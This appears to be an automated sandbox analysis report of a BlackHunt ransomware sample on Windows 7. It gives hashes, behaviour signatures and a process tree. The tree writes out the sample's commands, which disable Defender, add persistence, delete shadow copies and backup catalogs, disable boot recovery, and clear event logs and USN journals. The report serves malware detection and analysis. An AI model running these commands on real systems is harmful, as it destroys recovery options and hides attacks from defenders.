Analysis

  • max time kernel
    120s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    18/01/2024, 22:20

General

  • Target

    009af0f0e2131605b1fd2888c324f6ed29e0053b2caf18cab5764fd0795321ca.exe

  • Size

    707KB

  • MD5

    a969d3968621808fae8b69edccf4e468

  • SHA1

    da14bbb7e1d03c866c80c6f41833cf2d098f5a1f

  • SHA256

    009af0f0e2131605b1fd2888c324f6ed29e0053b2caf18cab5764fd0795321ca

  • SHA512

    8279a6b74b6c70b6d7c46c2ad3fda7c71b735c20d521d1f7a191cd30196fbc4bc30b872eb98fdaa7c1528fce120685d886a86e90d14f19edc89bf41e698b8907

  • SSDEEP

    6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1g86vnh:6uaTmkZJ+naie5OTamgEoKxLWrUh

Malware Config

Signatures

  • Deletes NTFS Change Journal 2 TTPs 2 IoCs

    The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs 5 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
  • Renames multiple (2868) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes backup catalog 3 TTPs 2 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Deletes itself 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 27 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 6 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 8 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\009af0f0e2131605b1fd2888c324f6ed29e0053b2caf18cab5764fd0795321ca.exe
    "C:\Users\Admin\AppData\Local\Temp\009af0f0e2131605b1fd2888c324f6ed29e0053b2caf18cab5764fd0795321ca.exe"
    1⤵
    • UAC bypass
    • Checks whether UAC is enabled
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:1200
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
      2⤵
        PID:2436
        • C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
          3⤵
          • Modifies registry class
          PID:2584
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        2⤵
          PID:2748
          • C:\Windows\system32\reg.exe
            reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
            3⤵
            • Modifies registry class
            PID:2144
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
          2⤵
            PID:2848
            • C:\Windows\system32\reg.exe
              reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
              3⤵
              • Modifies registry class
              PID:3052
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
            2⤵
              PID:2960
              • C:\Windows\system32\reg.exe
                reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
                3⤵
                • Modifies registry class
                PID:1940
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
              2⤵
                PID:2752
                • C:\Windows\system32\reg.exe
                  reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
                  3⤵
                  • Adds Run key to start application
                  PID:1632
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                2⤵
                  PID:2816
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                    3⤵
                      PID:3276
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                    2⤵
                      PID:2612
                      • C:\Windows\system32\reg.exe
                        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                        3⤵
                        • Modifies Windows Defender Real-time Protection settings
                        PID:3500
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
                      2⤵
                        PID:2720
                        • C:\Windows\system32\reg.exe
                          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
                          3⤵
                            PID:2884
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
                          2⤵
                            PID:2864
                            • C:\Windows\system32\reg.exe
                              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
                              3⤵
                                PID:2792
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
                              2⤵
                                PID:2824
                                • C:\Windows\system32\reg.exe
                                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
                                  3⤵
                                    PID:3180
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
                                  2⤵
                                    PID:2068
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
                                      3⤵
                                        PID:1704
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
                                      2⤵
                                        PID:2996
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
                                          3⤵
                                            PID:3152
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
                                          2⤵
                                            PID:2812
                                            • C:\Windows\system32\reg.exe
                                              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
                                              3⤵
                                                PID:108
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
                                              2⤵
                                                PID:2716
                                                • C:\Windows\system32\reg.exe
                                                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
                                                  3⤵
                                                    PID:2552
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
                                                  2⤵
                                                    PID:2860
                                                    • C:\Windows\system32\reg.exe
                                                      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
                                                      3⤵
                                                        PID:3136
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
                                                      2⤵
                                                        PID:2600
                                                        • C:\Windows\system32\reg.exe
                                                          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
                                                          3⤵
                                                            PID:3724
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
                                                          2⤵
                                                            PID:2636
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
                                                              3⤵
                                                                PID:2488
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                              2⤵
                                                                PID:1680
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                                  3⤵
                                                                    PID:2476
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
                                                                  2⤵
                                                                    PID:1748
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
                                                                      3⤵
                                                                        PID:3228
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                                      2⤵
                                                                        PID:2932
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                                          3⤵
                                                                            PID:3484
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                                                                          2⤵
                                                                            PID:2512
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                                                                              3⤵
                                                                                PID:3112
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                                                              2⤵
                                                                                PID:884
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                                                                  3⤵
                                                                                    PID:1780
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
                                                                                  2⤵
                                                                                    PID:2492
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
                                                                                      3⤵
                                                                                        PID:1792
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
                                                                                      2⤵
                                                                                        PID:1648
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
                                                                                          3⤵
                                                                                            PID:3376
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
                                                                                          2⤵
                                                                                            PID:2944
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
                                                                                              3⤵
                                                                                                PID:2796
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
                                                                                              2⤵
                                                                                                PID:2988
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
                                                                                                  3⤵
                                                                                                    PID:3224
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
                                                                                                  2⤵
                                                                                                    PID:2992
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
                                                                                                      3⤵
                                                                                                        PID:3420
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                                                                                                      2⤵
                                                                                                        PID:2264
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                                                                                                          3⤵
                                                                                                            PID:3360
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
                                                                                                          2⤵
                                                                                                            PID:2312
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
                                                                                                              3⤵
                                                                                                                PID:3404
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\009af0f0e2131605b1fd2888c324f6ed29e0053b2caf18cab5764fd0795321ca.exe" /F
                                                                                                              2⤵
                                                                                                                PID:2692
                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                  SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\009af0f0e2131605b1fd2888c324f6ed29e0053b2caf18cab5764fd0795321ca.exe" /F
                                                                                                                  3⤵
                                                                                                                  • Creates scheduled task(s)
                                                                                                                  PID:3676
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                                                                                                                2⤵
                                                                                                                  PID:1660
                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                                                                                                                    3⤵
                                                                                                                    • Interacts with shadow copies
                                                                                                                    PID:1756
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                                                                                                                  2⤵
                                                                                                                    PID:2800
                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                      vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                                                                                                                      3⤵
                                                                                                                      • Enumerates connected drives
                                                                                                                      • Interacts with shadow copies
                                                                                                                      PID:2608
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                                                                                                                    2⤵
                                                                                                                      PID:2964
                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                        vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                                                                                                                        3⤵
                                                                                                                        • Interacts with shadow copies
                                                                                                                        PID:1868
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                                                                                                                      2⤵
                                                                                                                        PID:592
                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                          vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                                                                                                                          3⤵
                                                                                                                          • Interacts with shadow copies
                                                                                                                          PID:3080
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
                                                                                                                        2⤵
                                                                                                                          PID:692
                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                            vssadmin.exe Delete Shadows /all /quiet
                                                                                                                            3⤵
                                                                                                                            • Interacts with shadow copies
                                                                                                                            PID:3936
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
                                                                                                                          2⤵
                                                                                                                            PID:268
                                                                                                                            • C:\Windows\system32\bcdedit.exe
                                                                                                                              bcdedit /set {default} recoveryenabled No
                                                                                                                              3⤵
                                                                                                                              • Modifies boot configuration data using bcdedit
                                                                                                                              PID:3096
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                            2⤵
                                                                                                                              PID:464
                                                                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                                                                bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                                3⤵
                                                                                                                                • Modifies boot configuration data using bcdedit
                                                                                                                                PID:3924
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                                                                                                                              2⤵
                                                                                                                                PID:3000
                                                                                                                                • C:\Windows\system32\fsutil.exe
                                                                                                                                  fsutil.exe usn deletejournal /D C:
                                                                                                                                  3⤵
                                                                                                                                  • Deletes NTFS Change Journal
                                                                                                                                  PID:3552
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                                                                                                                                2⤵
                                                                                                                                  PID:2888
                                                                                                                                  • C:\Windows\system32\wbadmin.exe
                                                                                                                                    wbadmin.exe delete catalog -quiet
                                                                                                                                    3⤵
                                                                                                                                    • Deletes backup catalog
                                                                                                                                    PID:3948
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                                  2⤵
                                                                                                                                    PID:2968
                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                      schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                                      3⤵
                                                                                                                                        PID:3908
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
                                                                                                                                      2⤵
                                                                                                                                        PID:1376
                                                                                                                                        • C:\Windows\system32\fsutil.exe
                                                                                                                                          fsutil usn deletejournal /D F:\
                                                                                                                                          3⤵
                                                                                                                                          • Enumerates connected drives
                                                                                                                                          PID:3360
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
                                                                                                                                        2⤵
                                                                                                                                          PID:2880
                                                                                                                                          • C:\Windows\system32\fsutil.exe
                                                                                                                                            fsutil usn deletejournal /D C:\
                                                                                                                                            3⤵
                                                                                                                                              PID:1556
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
                                                                                                                                            2⤵
                                                                                                                                              PID:2616
                                                                                                                                              • C:\Windows\system32\fsutil.exe
                                                                                                                                                fsutil usn deletejournal /D M:\
                                                                                                                                                3⤵
                                                                                                                                                • Enumerates connected drives
                                                                                                                                                PID:1364
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
                                                                                                                                              2⤵
                                                                                                                                                PID:4040
                                                                                                                                                • C:\Windows\system32\wevtutil.exe
                                                                                                                                                  wevtutil.exe cl Setup
                                                                                                                                                  3⤵
                                                                                                                                                  • Clears Windows event logs
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:2792
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
                                                                                                                                                2⤵
                                                                                                                                                  PID:3040
                                                                                                                                                  • C:\Windows\system32\wevtutil.exe
                                                                                                                                                    wevtutil.exe cl System
                                                                                                                                                    3⤵
                                                                                                                                                    • Clears Windows event logs
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:2260
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
                                                                                                                                                  2⤵
                                                                                                                                                    PID:1976
                                                                                                                                                    • C:\Windows\system32\wevtutil.exe
                                                                                                                                                      wevtutil.exe cl Application
                                                                                                                                                      3⤵
                                                                                                                                                      • Clears Windows event logs
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:2752
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2664
                                                                                                                                                      • C:\Windows\system32\wevtutil.exe
                                                                                                                                                        wevtutil.exe cl Security
                                                                                                                                                        3⤵
                                                                                                                                                        • Clears Windows event logs
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:2712
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
                                                                                                                                                      2⤵
                                                                                                                                                        PID:3220
                                                                                                                                                        • C:\Windows\system32\wevtutil.exe
                                                                                                                                                          wevtutil.exe cl Security /e:false
                                                                                                                                                          3⤵
                                                                                                                                                          • Clears Windows event logs
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:2424
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                        2⤵
                                                                                                                                                          PID:3368
                                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                                            vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                            3⤵
                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                            PID:3116
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
                                                                                                                                                          2⤵
                                                                                                                                                            PID:2256
                                                                                                                                                            • C:\Windows\system32\bcdedit.exe
                                                                                                                                                              bcdedit /set {default} recoveryenabled No
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies boot configuration data using bcdedit
                                                                                                                                                              PID:888
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                                                            2⤵
                                                                                                                                                              PID:2308
                                                                                                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                                                                3⤵
                                                                                                                                                                • Modifies boot configuration data using bcdedit
                                                                                                                                                                PID:1788
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                                                                                                                                                              2⤵
                                                                                                                                                                PID:1636
                                                                                                                                                                • C:\Windows\system32\fsutil.exe
                                                                                                                                                                  fsutil.exe usn deletejournal /D C:
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Deletes NTFS Change Journal
                                                                                                                                                                  PID:2144
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:2656
                                                                                                                                                                  • C:\Windows\system32\wbadmin.exe
                                                                                                                                                                    wbadmin.exe delete catalog -quiet
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Deletes backup catalog
